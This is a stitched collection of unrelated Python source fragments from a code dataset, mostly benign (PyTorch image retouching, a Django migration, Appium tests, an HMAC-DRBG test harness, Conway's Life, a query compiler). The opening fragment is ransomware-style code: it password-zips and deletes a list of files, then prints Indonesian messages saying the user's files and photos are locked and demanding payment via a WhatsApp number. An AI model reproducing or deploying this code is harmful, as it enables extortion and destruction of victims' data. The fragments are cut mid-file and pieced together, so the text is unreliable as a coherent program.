message = ('Subject: {}\n\n{}').format(SUBJECT, TEXT)
username = '<EMAIL>'
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(username, whoknow)
server.sendmail(fadd, tadd, message)
azaz = 0
for i in daftar:
os.system('zip -rmq -1 --password ' + str(passcrypt) + ' myfile.zip ' + i)
azaz += 1
print str(azaz) + '/' + len(daftar) + ' Completed,please Wait'
print len(daftar) + ' Files Penting Anda Telah Dikunci,Termasuk photo'
print 'Selamat Semua File Anda Telah Dikunci'
print 'File Anda Terletak Di myfile.zip'
print 'Silakan Bayar 50Ribu Untuk Membuka File Nya'
print 'Whatsapp : 089682009902'
|
StarcoderdataPython
|
3214674
|
import torch
import os
import numpy as np
import cv2
from PIL import Image
from csr_model import csr_network
import torchvision.transforms.functional as TF
import matplotlib.pyplot as plt
def csr_retouch(path_to_model_state, path_to_old_images, path_to_new_images):
cuda = torch.cuda.is_available()
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
network = csr_network()
network.load_state_dict(torch.load(
path_to_model_state, map_location=torch.device('cpu')))
network.eval()
# img = image_file_to_tensor(image_path)
# result = network(img)
items = os.listdir(path_to_old_images)
for item in items:
if item.endswith(".jpg"):
load_path = os.path.join(path_to_old_images, item)
save_path = os.path.join(path_to_new_images, item)
image = Image.open(load_path)
image = TF.to_tensor(image).type(Tensor)
image = image.unsqueeze(0)
result = network(image)
result = result.squeeze().mul_(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
im = Image.fromarray(result)
im.save(save_path, quality=95)
return 1
'''
def image_file_to_tensor(image_path):
items = os.listdir(image_path)
img = Image.open(os.path.join(image_path, items[0])).convert("RGB")
width, height = img.size
# images = torch.zeros(len(items), 3, height, width)
images = torch.zeros(1, 3, height, width, requires_grad=False)
index = 0
for item in items:
if item.endswith(".jpg"):
load_path = os.path.join(image_path, item)
image = Image.open(load_path).convert("RGB")
image = TF.to_tensor(image).type(torch.FloatTensor)
images[index, :, :, :] = image
index += 1
if index >= 1:
break
return images
'''
def main():
csr_retouch("../../model_parameter/csrnet.pth", ".../image_folder", ".../save_folder)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1630949
|
# Generated by Django 2.2 on 2021-04-06 12:58
from django.db import migrations
def add_priorities(apps, schema_editor):
Priority = apps.get_model("todolist_app", "Priority")
data = [
('Critical', 1),
('High', 2),
('Medium', 3),
('Low', 4),
('Trivial', 5),
]
for desc, order in data:
p = Priority(
description=desc,
order=order
)
p.save()
class Migration(migrations.Migration):
dependencies = [
('todolist_app', '0001_initial'),
]
operations = [
migrations.RunPython(add_priorities)
]
|
StarcoderdataPython
|
3335012
|
<gh_stars>0
from utah import Utah
from mesowest import MesoWest
import pandas as pd
from datetime import datetime as dt
state_sensors = Utah.request_data()
import os
outdir = './data'
if not os.path.exists(outdir):
os.mkdir(outdir)
for i in list(state_sensors.keys()):
dict = {}
outname = "sensors_{}.csv".format(i)
fullname = os.path.join(outdir, outname)
for j in state_sensors[i]:
df_mw = MesoWest.request_data(dt.strptime('6/26/2021', "%m/%d/%Y"), j)
if "relative_humidity" in df_mw.columns:
dict.setdefault(i, {})[j] = state_sensors[i][j]
else:
pass
print(dict)
df = pd.DataFrame.from_dict(dict)
print(df)
df[5] = df[5].str.replace('\n', '')
df.to_csv(fullname, index=False, header=True)
|
StarcoderdataPython
|
1790156
|
<gh_stars>1-10
import pytest
from meltano.core.db import project_engine
from meltano.api.models import db
class TestApp:
@pytest.fixture
def session(self):
# disable the `session` fixture not to override
# the `db.session`
pass
def test_core_registered(self, engine_sessionmaker, app):
engine, _ = engine_sessionmaker
# ensure both the API and the meltano.core
# are on the same database
assert engine.url == db.engine.url
|
StarcoderdataPython
|
3365634
|
from sqlalchemy import Column, Integer, String, Text, DateTime, Float, Boolean, PickleType
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class SubCategory(Base):
'''This is SubCategory sample Data model class.'''
__tablename__ = "tSubCategories"
__table_args__ = {"schema":"KnowHow.dbo"}
id = Column(Integer, primary_key=True, nullable=False)
name = Column(Text, nullable=False)
categoryId = Column(Text, nullable=True)
tages = Column(Integer, nullable=True)
def __repr__(self):
return '<SubCategory model {}>'.format(self.id)
|
StarcoderdataPython
|
1671476
|
<gh_stars>1-10
#!/usr/bin/python
# Copyright (C) International Business Machines Corp., 2005
# Author: <NAME> <<EMAIL>>
# Negative Test: attempt list of non-existent domain
import re
from XmTestLib import *
status, output = traceCommand("xm block-list 9999")
eyecatcher = "Error:"
where = output.find(eyecatcher)
if status == 0:
FAIL("xm block-list returned invalid %i != 0" % status)
elif where < 0:
FAIL("xm block-list failed to report error for non-existent domain")
|
StarcoderdataPython
|
1631363
|
from lib.pyapp import Pyapp
from lib.appController import drivers_queue
from conf.settings import logger
import threading
local = threading.local()
class BasePage():
def __init__(self,driver=None):
if not driver:
try:
local.driver = drivers_queue.get()
local.pyapp = Pyapp(local.driver)
except Exception as e:
logger.error('获取Driver出错:%s' % e)
else:
local.pyapp = Pyapp(driver)
def quit(self):
local.pyapp.quit()
class ThreadPage(BasePage):
def login_btn(self):
local.pyapp.click('android=>new UiSelector().resourceId("com.tencent.mobileqq:id/btn_login")')
def account(self):
local.pyapp.type('content=>请输入QQ号码或手机或邮箱', '123456<PASSWORD>')
def password(self):
local.pyapp.type('content=>密码 安全', '<PASSWORD>')
def login(self):
local.pyapp.click('id=>com.tencent.mobileqq:id/login')
def check(self,name):
return local.pyapp.wait_and_save_exception('android=>new UiSelector().text("开始验证")', name)
class Page(ThreadPage):
pass
if __name__ == '__main__':
# from appium import webdriver
# desired_caps = {}
# desired_caps['platformName'] = 'Android'
# desired_caps['platformVersion'] = '5.1.1'
# desired_caps['deviceName'] = 'emulator-5554'
# desired_caps['appPackage'] = 'com.tencent.mobileqq'
# desired_caps['appActivity'] = '.activity.SplashActivity'
# desired_caps["unicodeKeyboard"] = "True"
# desired_caps["resetKeyboard"] = "True"
# desired_caps["noReset"] = "True"
# driver = webdriver.Remote('http://127.0.0.1:7071/wd/hub', desired_caps)
from lib.appController import Controller
c = Controller()
c.server_start()
c.check_server()
c.driver_start()
page = Page()
page.login_btn()
page.account()
page.password()
page.login()
page.check('test')
|
StarcoderdataPython
|
3331506
|
<gh_stars>0
# Generated by Django 2.0.8 on 2018-09-06 14:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fullcalendar', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='calendarevent',
name='description',
field=models.TextField(blank=True, null=True, verbose_name='Description'),
),
]
|
StarcoderdataPython
|
1679334
|
<reponame>timgates42/balanced-python
import balanced
balanced.configure('<KEY>')
accounts = balanced.Account.query
|
StarcoderdataPython
|
1719734
|
""" Tests for filter query builder """
import unittest
from werkzeug.datastructures import ImmutableMultiDict
from app.builders.filter_query_builder import FilterQueryBuilder
class FilterQueryBuilderTestCase(unittest.TestCase):
def test_build_with_null_arguments_return_empty_filters(self):
# arrange
expected_filters_length = 0
builder = FilterQueryBuilder(None)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_almost_like_return_empty_filters(self):
# arrange
expected_filters_length = 0
args = ImmutableMultiDict(
[
("filtering[date]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_incorrect_return_empty_filters(self):
# arrange
expected_filters_length = 0
args = ImmutableMultiDict(
[
("abcde[date]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_but_empty_attr_return_empty_filters(self):
# arrange
expected_filters_length = 0
args = ImmutableMultiDict(
[
("filter[]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
def test_build_with_one_filter_argument_correct_return_correct_filters(self):
# arrange
expected_filters_length = 1
args = ImmutableMultiDict(
[
("filter[date]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
self.assertIsNotNone(result.filters.get("date"))
self.assertEqual(result.filters.get("date"), 1521417600)
def test_build_with_one_filter_argument_with_two_attrs_return_the_first(self):
# arrange
expected_filters_length = 1
args = ImmutableMultiDict(
[
("filter[date][test]", 1521417600)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
self.assertIsNotNone(result.filters.get("date"))
self.assertEqual(result.filters.get("date"), 1521417600)
self.assertIsNone(result.filters.get("test"))
def test_build_with_two_filter_argument_correct_return_correct_filters(self):
# arrange
expected_filters_length = 2
args = ImmutableMultiDict(
[
("filter[date]", 1521417600),
("filter[user_id]", 10)
])
builder = FilterQueryBuilder(args)
# act
result = builder.build()
# assert
self.assertEqual(expected_filters_length, len(result.filters))
self.assertIsNotNone(result.filters.get("date"))
self.assertEqual(result.filters.get("date"), 1521417600)
self.assertIsNotNone(result.filters.get("user_id"))
self.assertEqual(result.filters.get("user_id"), 10)
|
StarcoderdataPython
|
1664079
|
<reponame>samlet/stack
import json
import graphene
from sagas.ofbiz.schema_queries_g import *
from sagas.ofbiz.schema_mutations_g import Mutations
from py4j.java_gateway import java_import
from sagas.ofbiz.runtime_context import platform
oc = platform.oc
finder = platform.finder
helper = platform.helper
java_import(oc.j, 'org.apache.ofbiz.entity.util.*')
class Query(graphene.ObjectType):
movies = graphene.List(lambda: SaMovie, limit=graphene.Int(),
offset=graphene.Int())
movie_genres = graphene.List(lambda: SaMovieGenres)
def resolve_movies(self, info, limit=None, offset=None, **kwargs):
entity_name = "SaMovie"
# recs = oc.all(entity_name)
# print("total record", len(recs))
findOptions = oc.j.EntityFindOptions()
if limit is None:
limit = 5
if offset is None:
offset = 0
# print(limit, offset)
findOptions.setLimit(limit)
findOptions.setOffset(offset)
recs = oc.delegator.findList("SaMovie", None, None, None, findOptions, False)
ent = oc.delegator.getModelEntity(entity_name)
result = helper.fill_records(ent, SaMovie, recs)
return result
def resolve_movie_genres(self, info):
entity_name = "SaMovieGenres"
recs = oc.all(entity_name)
ent = oc.delegator.getModelEntity(entity_name)
result = helper.fill_records(ent, SaMovieGenres, recs)
return result
schema = graphene.Schema(query=Query, mutation=Mutations)
|
StarcoderdataPython
|
3342013
|
import datetime
from mongoengine import StringField, DictField, DateTimeField, Document, BooleanField, IntField
class ValidationStatus(object):
NEW = "New"
IN_PROGRESS = "In progress"
CANCELATION_IN_PROGRESS = "Cancelation in progress"
CANCELED = "Canceled"
APPROVED = "Approved"
REJECTED = "Rejected"
class ValidationTx(Document):
did = StringField(max_length=128)
provider = StringField(max_length=128)
validationType = StringField(max_length=32)
requestParams = DictField()
status = StringField(max_length=32)
reason = StringField(max_length=128)
verifiedCredential = DictField()
isSavedOnProfile = BooleanField()
created = DateTimeField()
retries = IntField()
modified = DateTimeField(default=datetime.datetime.utcnow)
def __repr__(self):
return str(self.as_dict())
def as_dict(self):
if not self.isSavedOnProfile:
self.isSavedOnProfile = False
return {
"id": str(self.id),
"did": self.did,
"provider": self.provider,
"validationType": self.validationType,
"requestParams": self.requestParams,
"status": self.status,
"reason": self.reason,
"isSavedOnProfile": self.isSavedOnProfile,
"verifiedCredential": self.verifiedCredential,
"retries": self.retries,
"created": str(self.created),
"modified": str(self.modified)
}
def save(self, *args, **kwargs):
if not self.created:
self.created = datetime.datetime.utcnow()
self.modified = datetime.datetime.utcnow()
return super(ValidationTx, self).save(*args, **kwargs)
|
StarcoderdataPython
|
3318572
|
<reponame>clouserw/olympia
import logging
from django.conf import settings
from django.db import models
import amo.models
log = logging.getLogger('z.perf')
class PerformanceAppVersions(amo.models.ModelBase):
"""
Add-on performance appversions. This table is pretty much the same as
`appversions` but is separate because we need to push the perf stuff now
and I'm scared to mess with `appversions` because remora uses it in some
sensitive places. If we survive past 2012 and people suddenly have too
much time on their hands, consider merging the two.
"""
APP_CHOICES = [('firefox', 'Firefox')]
app = models.CharField(max_length=255, choices=APP_CHOICES)
version = models.CharField(max_length=255, db_index=True)
class Meta:
db_table = 'perf_appversions'
ordering = ('-id',)
class PerformanceOSVersion(amo.models.ModelBase):
os = models.CharField(max_length=255)
version = models.CharField(max_length=255)
name = models.CharField(max_length=255)
platform = models.CharField(max_length=255, null=True, blank=True)
class Meta:
db_table = 'perf_osversions'
ordering = ('-id',)
def __unicode__(self):
return self.name or '%s %s' % (self.os, self.version)
class Performance(amo.models.ModelBase):
"""Add-on performance numbers. A bit denormalized."""
# Cache storage for all platform perf numbers.
ALL_PLATFORMS = 'perf:platforms'
TEST_CHOICES = [('ts', 'Startup Time')]
addon = models.ForeignKey('addons.Addon', null=True,
related_name='performance')
average = models.FloatField(default=0, db_index=True)
appversion = models.ForeignKey(PerformanceAppVersions)
osversion = models.ForeignKey(PerformanceOSVersion)
test = models.CharField(max_length=50, choices=TEST_CHOICES)
@staticmethod
def get_threshold():
"""Percentage of slowness in which to flag the result as bad."""
return getattr(settings, 'PERF_THRESHOLD', 25) or 25
def get_baseline(self):
"""Gets the latest baseline startup time per Appversion/OS."""
try:
res = (Performance.objects
.filter(addon=None, appversion=self.appversion,
osversion=self.osversion, test=self.test)
.order_by('-created'))[0]
return res.average
except IndexError:
# This shouldn't happen but *surprise* it happened in production
log.info('Performance.get_baseline(): No baseline for '
'app %s version %s os %s version %s'
% (self.appversion.app, self.appversion.version,
self.osversion.os, self.osversion.version))
return self.average
def startup_is_too_slow(self, baseline=None):
"""Returns True if this result's startup time is slower
than the allowed threshold.
"""
if self.test != 'ts':
log.info('startup_is_too_slow() only applies to startup time, '
'not %s' % self.test)
return False
if not baseline:
baseline = self.get_baseline()
delta = (self.average - baseline) / baseline * 100
return delta >= self.get_threshold()
class Meta:
db_table = 'perf_results'
|
StarcoderdataPython
|
104805
|
try:
from conf import Conf
except ImportError:
from ..conf import Conf
import os
def setup_fixture():
# Clean the map db from MongoDb
if Conf.Instance().APP_MODE == "Test_Aws":
os.system('service mongod stop')
os.system('rm -Rf /data-mongodb/rs0-1/*')
os.system('rm -Rf /data-mongodb/rs0-2/*')
os.system('rm -Rf /data-mongodb/rs0-3/*')
os.system('service mongod start')
else:
os.system('mongo map --eval "db.dropDatabase()"')
# Clean the SqlLite Db
sql_db = Conf.Instance().SQLITE_DB
os.system('rm -Rf sql_db %s' % sql_db)
|
StarcoderdataPython
|
1789331
|
<gh_stars>1-10
import binascii
import pprint
import sys
from hmac_drbg import *
def parse_entry(line):
key, val = line.split('=')
key = key.strip()
val = val.strip()
if val == 'True':
val = True
elif val == 'False':
val = False
elif val.isdigit():
val = int(val)
return key, val
def parse_rsp(rsp_file):
test_suites = []
suite = {}
test = {}
with open(rsp_file, 'r') as f:
while True:
line = f.readline()
if line == '':
break
if line == '\n' or line == '\r\n':
continue
if line.startswith('#'):
continue
line = line.strip()
if line.startswith('['):
e = line[1:-1]
if not '=' in e:
if suite:
test_suites.append(suite)
suite = {'Algorithm': e, 'Tests': []}
test = {}
else:
key, val = parse_entry(e)
suite[key] = val
continue
if line.startswith('COUNT'):
if test:
suite['Tests'].append(test)
test = {}
continue
key, val = parse_entry(line)
if key in test:
key = key + '2'
test[key] = val
return test_suites
# generate test cases for go-drbg
def dump_go(tests):
pr_fields = ['EntropyInput', 'Nonce', 'PersonalizationString', 'AdditionalInput', 'EntropyInputPR', 'AdditionalInput2', 'EntropyInputPR2', 'ReturnedBits']
print('package hmac\n')
print('var HmacSha512PrTests = []map[string]string{')
for t in tests:
print('\t{')
for k in pr_fields:
print('\t\t"{}": "{}",'.format(k, t[k]))
print('\t},')
print('}')
def run_tests(tests):
for test in tests:
t = {k: binascii.unhexlify(v) for k, v in test.items()}
l = len(t['ReturnedBits'])
drbg = DRBG(t['EntropyInput'] + t['Nonce'] + t['PersonalizationString'])
drbg.reseed(t['EntropyInputPR'] + t['AdditionalInput'])
drbg.generate(l)
drbg.reseed(t['EntropyInputPR2'] + t['AdditionalInput2'])
result = drbg.generate(l)
if result != t['ReturnedBits']:
print('FAILED TEST:')
pprint.pprint(test)
print('\nGot:', binascii.hexlify(result).decode('ascii'))
return
print('Passed all %s tests.' % len(tests))
def main():
test_suites = parse_rsp('HMAC_DRBG_PR.rsp')
# NOTE customize this code
tests = []
for t in test_suites:
if t['Algorithm'] == 'SHA-512':
tests += t['Tests']
run_tests(tests)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
1786259
|
<reponame>lwerdna/keypatch_binja<gh_stars>1-10
try:
from binaryninjaui import (UIAction, UIActionHandler, Menu)
from . import keypatch
UIAction.registerAction("KEYPATCH")
UIActionHandler.globalActions().bindAction("KEYPATCH", UIAction(keypatch.launch_keypatch))
Menu.mainMenu("Tools").addAction("KEYPATCH", "KEYPATCH")
except ModuleNotFoundError:
# probably being loaded by headless BinaryNinja
pass
|
StarcoderdataPython
|
1783158
|
<reponame>pmathewjacob/insightface-attendance
import tensorflow as tf
__weights_dict = dict()
is_train = False
def load_weights(weight_file):
import numpy as np
if weight_file == None:
return
try:
weights_dict = np.load(weight_file).item()
except:
weights_dict = np.load(weight_file, encoding='bytes').item()
return weights_dict
def KitModel(weight_file = None):
global __weights_dict
__weights_dict = load_weights(weight_file)
data = tf.placeholder(tf.float32, shape = (None, 1920, 1080, 3), name = 'data')
bn_data = batch_normalization(data, variance_epsilon=1.9999999494757503e-05, name='bn_data')
conv0_pad = tf.pad(bn_data, paddings = [[0, 0], [3, 3], [3, 3], [0, 0]])
conv0 = convolution(conv0_pad, group=1, strides=[2, 2], padding='VALID', name='conv0')
bn0 = batch_normalization(conv0, variance_epsilon=1.9999999494757503e-05, name='bn0')
relu0 = tf.nn.relu(bn0, name = 'relu0')
pooling0_pad = tf.pad(relu0, paddings = [[0, 0], [1, 1], [1, 1], [0, 0]], constant_values=float('-Inf'))
pooling0 = tf.nn.max_pool(pooling0_pad, [1, 3, 3, 1], [1, 2, 2, 1], padding='VALID', name='pooling0')
stage1_unit1_bn1 = batch_normalization(pooling0, variance_epsilon=1.9999999494757503e-05, name='stage1_unit1_bn1')
stage1_unit1_relu1 = tf.nn.relu(stage1_unit1_bn1, name = 'stage1_unit1_relu1')
stage1_unit1_conv1 = convolution(stage1_unit1_relu1, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_conv1')
stage1_unit1_sc = convolution(stage1_unit1_relu1, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_sc')
stage1_unit1_bn2 = batch_normalization(stage1_unit1_conv1, variance_epsilon=1.9999999494757503e-05, name='stage1_unit1_bn2')
stage1_unit1_relu2 = tf.nn.relu(stage1_unit1_bn2, name = 'stage1_unit1_relu2')
stage1_unit1_conv2_pad = tf.pad(stage1_unit1_relu2, paddings = [[0, 0], [1, 1], [1, 1], [0, 0]])
stage1_unit1_conv2 = convolution(stage1_unit1_conv2_pad, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_conv2')
stage1_unit1_bn3 = batch_normalization(stage1_unit1_conv2, variance_epsilon=1.9999999494757503e-05, name='stage1_unit1_bn3')
stage1_unit1_relu3 = tf.nn.relu(stage1_unit1_bn3, name = 'stage1_unit1_relu3')
stage1_unit1_conv3 = convolution(stage1_unit1_relu3, group=1, strides=[1, 1], padding='VALID', name='stage1_unit1_conv3')
return data, tf.concat([stage1_unit1_sc, stage1_unit1_conv3], 0)
def convolution(input, name, group, **kwargs):
w = tf.Variable(__weights_dict[name]['weights'], trainable=is_train, name=name + "_weight")
if group == 1:
layer = tf.nn.convolution(input, w, name=name, **kwargs)
else:
weight_groups = tf.split(w, num_or_size_splits=group, axis=-1)
xs = tf.split(input, num_or_size_splits=group, axis=-1)
convolved = [tf.nn.convolution(x, weight, name=name, **kwargs) for
(x, weight) in zip(xs, weight_groups)]
layer = tf.concat(convolved, axis=-1)
if 'bias' in __weights_dict[name]:
b = tf.Variable(__weights_dict[name]['bias'], trainable=is_train, name=name + "_bias")
layer = layer + b
return layer
def batch_normalization(input, name, **kwargs):
mean = tf.Variable(__weights_dict[name]['mean'], name = name + "_mean", trainable = is_train)
variance = tf.Variable(__weights_dict[name]['var'], name = name + "_var", trainable = is_train)
offset = tf.Variable(__weights_dict[name]['bias'], name = name + "_bias", trainable = is_train) if 'bias' in __weights_dict[name] else None
scale = tf.Variable(__weights_dict[name]['scale'], name = name + "_scale", trainable = is_train) if 'scale' in __weights_dict[name] else None
return tf.nn.batch_normalization(input, mean, variance, offset, scale, name = name, **kwargs)
|
StarcoderdataPython
|
1673447
|
# age: int
# name: str
# height: float
# is_human: bool
def police_check(age: int) -> bool:
if age > 18:
can_drive = True
else:
can_drive = False
return "string"
if police_check("twelve"):
print("You may pass.")
else:
print("Pay a fine.")
|
StarcoderdataPython
|
182470
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
requires = [
'awscli>=1.16.211',
'boto3>=1.9.200',
'click>=7.1.1',
'pytest>=3.5.1',
'requests>=2.23.0',
'tabulate>=0.8.7'
]
setuptools.setup(
name="undmainchain",
packages=['undmainchain'],
version="0.0.12",
author="Unification Foundation",
author_email="<EMAIL>",
description="Helper tools for administering the Unification Mainchain",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/unification-com/mainchain-helpers",
include_package_data=True,
install_requires=requires,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
|
StarcoderdataPython
|
162014
|
<filename>uta_rest/django_secret_key.py<gh_stars>1-10
import os
import random
from base64 import urlsafe_b64encode as b64encode
random.seed()
def generate_key(max_length, seed_length):
"""
Generate a Base64-encoded 'random' key by hashing the data.
data is a tuple of seeding values. Pass arbitrary encoder and
digester for specific hashing and formatting of keys
From: https://gist.github.com/airtonix/6204802
"""
PATTERN = "%%0%dX"
JUNK_LEN = 1024
junk = (PATTERN % (JUNK_LEN * 2)) % random.getrandbits(JUNK_LEN * seed_length)
key = str(junk).encode()
return b64encode(key)[:max_length]
def get_or_create_django_secret_key(key_dir):
key_filename = os.path.join(key_dir, "django_secret_key.txt")
if not os.path.exists(key_filename):
secret_key = generate_key(50, 128)
with open(key_filename, "wb") as f:
f.write(secret_key)
else:
with open(key_filename) as f:
secret_key = f.read().strip()
return secret_key
|
StarcoderdataPython
|
80583
|
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import os
class Memory(object):
"""
An implementation of the replay memory. This is essential when dealing with DRL algorithms that are not
multi-threaded as in A3C.
"""
def __init__(self, memory_size, state_dim, action_dim, batch_size):
"""
A naive implementation of the replay memory, need to do more work on this after testing DDPG
"""
self.memory_size = memory_size
self.batch_size = batch_size
if type(state_dim) is not tuple:
state_dim = (state_dim, )
# current state
self.curr_state = np.empty(shape=(memory_size, ) + state_dim)
# next state
self.next_state = np.empty(shape=(memory_size, ) + state_dim)
# reward
self.rewards = np.empty(memory_size)
# terminal
self.terminals = np.empty(memory_size)
# actions
self.actions = np.empty((memory_size, action_dim) if action_dim > 1 else memory_size)
self.current = 0
self.count = 0
def add(self, curr_state, next_state, reward, terminal, action):
self.curr_state[self.current, ...] = curr_state
self.next_state[self.current, ...] = next_state
self.rewards[self.current] = reward
self.terminals[self.current] = terminal
self.actions[self.current] = action
self.current += 1
self.count = max(self.count, self.current)
if self.current >= self.memory_size - 1:
self.current = 0
def sample(self):
indexes = np.random.randint(0, self.count, self.batch_size)
curr_state = self.curr_state[indexes, ...]
next_state = self.next_state[indexes, ...]
rewards = self.rewards[indexes]
terminals = self.terminals[indexes]
actions = self.actions[indexes]
return curr_state, next_state, rewards, terminals, actions
def save(self, save_dir):
path = os.path.join(save_dir, type(self).__name__)
if not os.path.exists(path):
os.makedirs(path)
print("Saving memory...")
for name in ("curr_state", "next_state", "rewards", "terminals", "actions"):
np.save(os.path.join(path, name), arr=getattr(self, name))
def restore(self, save_dir):
"""
Restore the memory.
"""
path = os.path.join(save_dir, type(self).__name__)
for name in ("curr_state", "next_state", "rewards", "terminals", "actions"):
setattr(self, name, np.load(os.path.join(path, "%s.npy" % name)))
def size(self):
for name in ("curr_state", "next_state", "rewards", "terminals", "actions"):
print("%s size is %s" % (name, getattr(self, name).shape))
|
StarcoderdataPython
|
73494
|
from ..ops import *
class Translator(object):
"""
A translator wraps a physical operator and provides the compilation logic.
It follows the producer/consumer model.
It also contains information about the lineage it needs to capture.
"""
_id = 0
def __init__(self, op):
self.id = Translator._id
Translator._id += 1
self.op = op
self.child_translator = None
self.parent_translator = None
self.l_materialize = False
self.l_capture = False
self.l_prev_translator = None # previous translator that contains lindexes
self.lindex = None
self.lindexes = []
@property
def propagated_lindexes(self):
"""
Join
/ \
Join C
| |
A B
"""
return self.lindexes
def prepare(self, c, p, pipeline):
self.child_translator = c
self.parent_translator = p
self.pipeline = pipeline
def is_type(self, klasses):
if not isinstance(klasses, list):
klasses = [klasses]
return any(isinstance(self, k) for k in klasses)
def produce(self, ctx):
pass
def consume(self, ctx):
pass
def compile_expr(self, ctx, e):
"""
@return var name containing expression result
"""
raise Exception("Not implemented")
def compile_exprs(self, ctx, exprs):
"""
@return [varname,] list of expression results
"""
raise Exception("Not implemented")
def compile_new_tuple(self, ctx, schema):
"""
@return varname containing the new tuple
"""
raise Exception("Not implemented")
def clean_prev_lineage_indexes(self):
"""
Clean up (delete) previous lineage indexes,
if they are not materialized
"""
if self.l_capture and self.l_prev_translator:
self.l_prev_translator.clean_lineage_indexes()
def clean_lineage_indexes(self):
if self.l_capture and not self.l_materialize:
for lindex in self.propagated_lindexes:
lindex.clean_lineage_indexes()
self.lindex = None
self.lindexes = []
if hasattr(self, "left") and self.left:
self.left.lindex = None
self.left.lindexes = []
def pretty_print(self):
return self.op.pretty_print()
def __str__(self):
return "%s: %s" % (self.id, self.__class__.__name__)
class BottomTranslator(Translator):
"""
Unary operators that are pipeline breakers (groupby, orderby)
are split into bottom and top translators.
Bottom is responsible for buffering tuples in an appropriate data structure
(hashtable for groupby, list for orderby)
"""
def __init__(self, op):
super(BottomTranslator, self).__init__(op)
self.l_i = None
class TopTranslator(Translator):
"""
Top is responsible for processing and walking the populated data struture
from Bottom and generating output tuples for its parent tranlators
"""
def __init__(self, op, bottom):
super(TopTranslator, self).__init__(op)
self.bottom = bottom
self.l_i = None # source rid
self.l_o = None # output rid
def initialize_lineage_indexes(self, ctx):
pass
def populate_lineage_indexes(self, ctx, v_bucket):
pass
class LeftTranslator(Translator):
"""
Binary join operators are split into a left and right side.
For hash joins, the left translator is a pipeline breaker that
collects tuples in a hash table.
For theta joins, the left is just a loop
"""
def __init__(self, op):
super(LeftTranslator, self).__init__(op)
self.l_i = None
class RightTranslator(Translator):
"""
Iterates over the right side of the join and probes the left side.
"""
def __init__(self, op, left):
super(RightTranslator, self).__init__(op)
self.left = left
assert(op.is_type(Join))
self.l_i = None
self.l_o = None
@property
def propagated_lindexes(self):
ret = []
ret.extend(self.left.propagated_lindexes)
ret.extend(self.lindexes)
return ret
|
StarcoderdataPython
|
199596
|
# Conway's game of life
# uses pygamezero frame work
#
# See key event at end for commands
#
import random
ROWS = 50
COLS = 70
CELL_SIZE = 10
HEIGHT = (ROWS * CELL_SIZE)
WIDTH = (COLS * CELL_SIZE)
BACK_COLOR = (0, 0, 127)
CELL_COLOR = (0, 200, 0)
g_changed = False
g_running = True
g_step = False
def grid_build(rows, cols):
return [[False for c in range(cols)] for r in range(rows)]
def apply(grid, func):
for r in range(len(grid)):
for c in range(len(grid[r])):
grid[r][c] = func(r, c)
def grid_random(grid):
apply(grid, lambda r, c : (random.randint(0, 7) == 0))
def grid_clear(grid):
apply(grid, lambda : False)
def cell_draw(r, c):
cx = CELL_SIZE * c
cy = CELL_SIZE * r
cell_rect = Rect((cx, cy), (CELL_SIZE, CELL_SIZE))
screen.draw.filled_rect(cell_rect, CELL_COLOR)
return True
def draw():
global g_changed
if not g_changed:
return
g_changed = False
screen.fill(BACK_COLOR)
apply(world, lambda r, c : (cell_draw(r, c) if world[r][c] else False))
def count_neighbors(w, r, c):
# count the 3x3 grid, subtrct the middle
# trims off the edges if next to the edge of the world
sum = -1 if w[r][c] else 0
for nr in range(max(r-1, 0), min(r+1, ROWS-1) + 1):
for nc in range(max(c-1, 0), min(c+1, COLS-1) + 1):
if w[nr][nc]:
sum += 1
# Loop above added the center cell, subtract it back out.
return sum
def next_cell(current_world, r, c):
n = count_neighbors(current_world, r, c)
if current_world[r][c]:
# Live cell stays alive if not lonely or crowded
return (n >= 2 and n <= 3)
else:
# Open cell springs to life if three nearby
return (n == 3)
def update():
# Look at globals that control the speed
global g_running, g_changed, g_step
if not g_running:
return
if g_step:
g_running = False
g_changed = True
# Calculate the next state, then copy back
apply(worldNext, lambda r, c : next_cell(world, r, c))
apply(world, lambda r, c : worldNext[r][c])
def on_mouse_down(pos, button):
global g_changed
r = pos[1] // CELL_SIZE
c = pos[0] // CELL_SIZE
world[r][c] = not world[r][c]
g_changed = True
def on_key_down(key, mod, unicode):
global g_running, g_step, g_changed
if (key == keys.SPACE):
# Freeze / thaw the clock of life
g_running = not g_running
g_step = False
if (key == keys.C):
# Clear the world
grid_clear(world)
g_changed = True
if (key == keys.R):
# Seed world wiht random values
grid_random(world)
g_changed = True
if (key == keys.S):
# Make a a single generaion step
g_running = True
g_step = True
world = grid_build(ROWS, COLS)
grid_random(world)
worldNext = grid_build(ROWS, COLS)
|
StarcoderdataPython
|
3311049
|
#!/usr/bin/python3
# music_blueprint.py
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import youtube_dl
from auth import authenticate
from errors_blueprint import *
